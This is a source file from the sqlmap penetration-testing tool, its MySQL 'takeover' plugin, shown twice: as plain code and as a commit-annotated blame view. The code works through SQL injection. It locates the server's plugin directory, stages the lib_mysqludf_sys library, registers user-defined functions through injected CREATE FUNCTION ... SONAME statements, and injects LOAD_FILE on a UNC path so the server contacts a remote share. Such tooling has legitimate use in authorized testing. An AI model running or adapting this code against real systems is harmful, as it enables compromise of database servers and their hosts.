sqlmap/plugins/dbms/mysql/takeover.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

import re

from lib.core.agent import agent
from lib.core.common import isTechniqueAvailable
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import PAYLOAD
from lib.request import inject
from lib.request.connect import Connect as Request

from plugins.generic.takeover import Takeover as GenericTakeover

class Takeover(GenericTakeover):
    def __init__(self):
        self.__basedir = None
        self.__datadir = None

        GenericTakeover.__init__(self)

    def udfSetRemotePath(self):
        self.getVersionFromBanner()

        banVer = kb.bannerFp["dbmsVersion"]

        # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0
        if banVer >= "5.1.19":
            if self.__basedir is None:
                logger.info("retrieving MySQL base directory absolute path")

                # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir
                self.__basedir = inject.getValue("SELECT @@basedir")

                if re.search("^[\w]\:[\/\\\\]+", self.__basedir, re.I):
                    kb.os = "Windows"
                else:
                    kb.os = "Linux"

            # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin
            if kb.os == "Windows":
                self.__basedir += "/lib/plugin"
            else:
                self.__basedir += "/lib/mysql/plugin"

            self.__basedir = ntToPosixSlashes(normalizePath(self.__basedir))
            self.udfRemoteFile = "%s/%s.%s" % (self.__basedir, self.udfSharedLibName, self.udfSharedLibExt)

        # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
        # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
        else:
            #logger.debug("retrieving MySQL data directory absolute path")

            # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir
            #self.__datadir = inject.getValue("SELECT @@datadir")

            # NOTE: specifying the relative path as './udf.dll'
            # saves in @@datadir on both MySQL 4.1 and MySQL 5.0
            self.__datadir = "."
            self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir))

            # The DLL can be in either C:\WINDOWS, C:\WINDOWS\system,
            # C:\WINDOWS\system32, @@basedir\bin or @@datadir
            self.udfRemoteFile = "%s/%s.%s" % (self.__datadir, self.udfSharedLibName, self.udfSharedLibExt)

    def udfSetLocalPaths(self):
        self.udfLocalFile     = paths.SQLMAP_UDF_PATH
        self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)

        msg = "what is the back-end database management system architecture?"
        msg += "\n[1] 32-bit (default)"
        msg += "\n[2] 64-bit"

        while True:
            arch = readInput(msg, default='1')

            if isinstance(arch, basestring) and arch.isdigit() and int(arch) in ( 1, 2 ):
                if int(arch) == 1:
                    arch = 32
                else:
                    arch = 64

                break
            else:
                warnMsg = "invalid value, valid values are 1 and 2"
                logger.warn(warnMsg)

        if kb.os == "Windows":
            self.udfLocalFile   += "/mysql/windows/%d/lib_mysqludf_sys.dll" % arch
            self.udfSharedLibExt = "dll"
        else:
            self.udfLocalFile   += "/mysql/linux/%d/lib_mysqludf_sys.so" % arch
            self.udfSharedLibExt = "so"

    def udfCreateFromSharedLib(self, udf, inpRet):
        if udf in self.udfToCreate:
            logger.info("creating UDF '%s' from the binary UDF file" % udf)

            ret = inpRet["return"]

            # Reference: http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
            inject.goStacked("DROP FUNCTION %s" % udf)
            inject.goStacked("CREATE FUNCTION %s RETURNS %s SONAME '%s.%s'" % (udf, ret, self.udfSharedLibName, self.udfSharedLibExt))

            self.createdUdf.add(udf)
        else:
            logger.debug("keeping existing UDF '%s' as requested" % udf)

    def uncPathRequest(self):
        if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
            query   = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
            query   = agent.suffixQuery(query)
            payload = agent.payload(newValue=query)

            Request.queryPage(payload)
        else:
            inject.goStacked("SELECT LOAD_FILE('%s')" % self.uncPath, silent=True)
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`#!/usr/bin/env python`

			`"""`
			$Id$

update of copyright string (until year) 2011-04-15 16:33:18 +04:00			`Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`"""`

			`import re`

			`from lib.core.agent import agent`
update 2010-12-18 18:57:47 +03:00			`from lib.core.common import isTechniqueAvailable`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.core.common import normalizePath`
			`from lib.core.common import ntToPosixSlashes`
			`from lib.core.common import randomStr`
Gone unnoticed for way too long 2011-04-08 15:15:19 +04:00			`from lib.core.common import readInput`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.core.data import kb`
			`from lib.core.data import logger`
			`from lib.core.data import paths`
update 2010-12-18 18:57:47 +03:00			`from lib.core.enums import PAYLOAD`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.request import inject`
			`from lib.request.connect import Connect as Request`

			`from plugins.generic.takeover import Takeover as GenericTakeover`

			`class Takeover(GenericTakeover):`
			`def __init__(self):`
Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`self.__basedir = None`
			`self.__datadir = None`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`GenericTakeover.__init__(self)`

			`def udfSetRemotePath(self):`
			`self.getVersionFromBanner()`

			`banVer = kb.bannerFp["dbmsVersion"]`

Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`# On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0`
			`if banVer >= "5.1.19":`
			`if self.__basedir is None:`
			`logger.info("retrieving MySQL base directory absolute path")`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`# Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir`
			`self.__basedir = inject.getValue("SELECT @@basedir")`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`if re.search("^[\w]\:[\/\\\\]+", self.__basedir, re.I):`
			`kb.os = "Windows"`
			`else:`
			`kb.os = "Linux"`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`# The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin`
			`if kb.os == "Windows":`
			`self.__basedir += "/lib/plugin"`
			`else:`
			`self.__basedir += "/lib/mysql/plugin"`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`self.__basedir = ntToPosixSlashes(normalizePath(self.__basedir))`
			`self.udfRemoteFile = "%s/%s.%s" % (self.__basedir, self.udfSharedLibName, self.udfSharedLibExt)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`# On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file`
			`# On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file`
			`else:`
			`#logger.debug("retrieving MySQL data directory absolute path")`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`# Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir`
			`#self.__datadir = inject.getValue("SELECT @@datadir")`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`# NOTE: specifying the relative path as './udf.dll'`
			`# saves in @@datadir on both MySQL 4.1 and MySQL 5.0`
			`self.__datadir = "."`
			`self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir))`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code refactoring and bug fix in the rare case that MySQL on Linux runs as root or the plugin dir (/usr/lib/.*?/plugin is world-writable 2010-07-01 14:39:04 +04:00			`# The DLL can be in either C:\WINDOWS, C:\WINDOWS\system,`
			`# C:\WINDOWS\system32, @@basedir\bin or @@datadir`
			`self.udfRemoteFile = "%s/%s.%s" % (self.__datadir, self.udfSharedLibName, self.udfSharedLibExt)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`def udfSetLocalPaths(self):`
			`self.udfLocalFile = paths.SQLMAP_UDF_PATH`
			`self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)`

Gone unnoticed for way too long 2011-04-08 15:15:19 +04:00			`msg = "what is the back-end database management system architecture?"`
			`msg += "\n[1] 32-bit (default)"`
			`msg += "\n[2] 64-bit"`

			`while True:`
			`arch = readInput(msg, default='1')`

			`if isinstance(arch, basestring) and arch.isdigit() and int(arch) in ( 1, 2 ):`
			`if int(arch) == 1:`
			`arch = 32`
			`else:`
			`arch = 64`

			`break`
			`else:`
			`warnMsg = "invalid value, valid values are 1 and 2"`
			`logger.warn(warnMsg)`

Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`if kb.os == "Windows":`
Gone unnoticed for way too long 2011-04-08 15:15:19 +04:00			`self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % arch`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`self.udfSharedLibExt = "dll"`
			`else:`
Gone unnoticed for way too long 2011-04-08 15:15:19 +04:00			`self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % arch`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`self.udfSharedLibExt = "so"`

			`def udfCreateFromSharedLib(self, udf, inpRet):`
			`if udf in self.udfToCreate:`
			`logger.info("creating UDF '%s' from the binary UDF file" % udf)`

			`ret = inpRet["return"]`

			`# Reference: http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html`
			`inject.goStacked("DROP FUNCTION %s" % udf)`
			`inject.goStacked("CREATE FUNCTION %s RETURNS %s SONAME '%s.%s'" % (udf, ret, self.udfSharedLibName, self.udfSharedLibExt))`

			`self.createdUdf.add(udf)`
			`else:`
			`logger.debug("keeping existing UDF '%s' as requested" % udf)`

			`def uncPathRequest(self):`
update 2010-12-18 18:57:47 +03:00			`if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):`
Minor code adjustments 2010-10-25 18:11:47 +04:00			`query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)`
Proper english (--postfix is now --suffix) and --string/--regexp does not necessarily need to match into the original response body, it might well be in the injected True condition only! 2010-11-18 01:00:09 +03:00			`query = agent.suffixQuery(query)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`payload = agent.payload(newValue=query)`

			`Request.queryPage(payload)`
			`else:`
			`inject.goStacked("SELECT LOAD_FILE('%s')" % self.uncPath, silent=True)`